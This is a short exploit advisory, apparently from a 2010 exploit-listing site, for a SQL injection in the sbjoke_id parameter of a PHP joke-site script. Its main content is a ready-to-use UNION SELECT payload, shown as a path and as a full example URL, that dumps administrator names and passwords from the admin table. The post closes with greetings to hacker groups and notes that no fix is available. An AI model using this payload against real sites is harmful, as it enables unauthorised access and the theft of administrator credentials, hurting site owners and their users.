PHP Joke Site Software (sbjoke_id) SQL Injection Vuln

2010-09-01 18:15:07

[#] Title: PHP Joke Site Software (sbjoke_id) SQL Injection Vuln

[#] Link: http://www.softbizscripts.com/jokes-script-features.php

[#] Author: BorN To K!LL - h4ck3r

[#] 3xploit:

/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--

[#] 3xample:

http://www.site.com/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--

[#] Greetings:

[Dr.2] , [darkc0de team] , [AsbMay's Group] , n all ...

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.